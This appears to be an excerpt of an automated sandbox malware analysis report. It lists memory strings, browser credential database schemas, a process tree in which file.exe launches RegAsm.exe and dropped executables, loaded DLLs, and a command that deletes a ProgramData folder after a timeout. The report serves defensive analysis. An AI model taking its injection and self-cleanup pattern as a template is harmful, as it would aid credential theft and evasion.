Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1427642500.000000006CD7F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: HJKKFI.29.dr, IIJJDGHJKKJEBFHJDBGH.3.dr, GIJKKK.29.dr, GDHDAEBGCAAFIDGCGDHI.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.1426203264.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943691071.00000000244D8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.29.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr, softokn3[1].dll.29.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 1704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userFBKFCFBFID.exe "C:\Users\userFBKFCFBFID.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIEHDAFHDHC.exe "C:\Users\userIEHDAFHDHC.exe"	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DHCGHDHIDH.exe "C:\ProgramData\DHCGHDHIDH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\HDAFIIDAKJ.exe "C:\ProgramData\HDAFIIDAKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
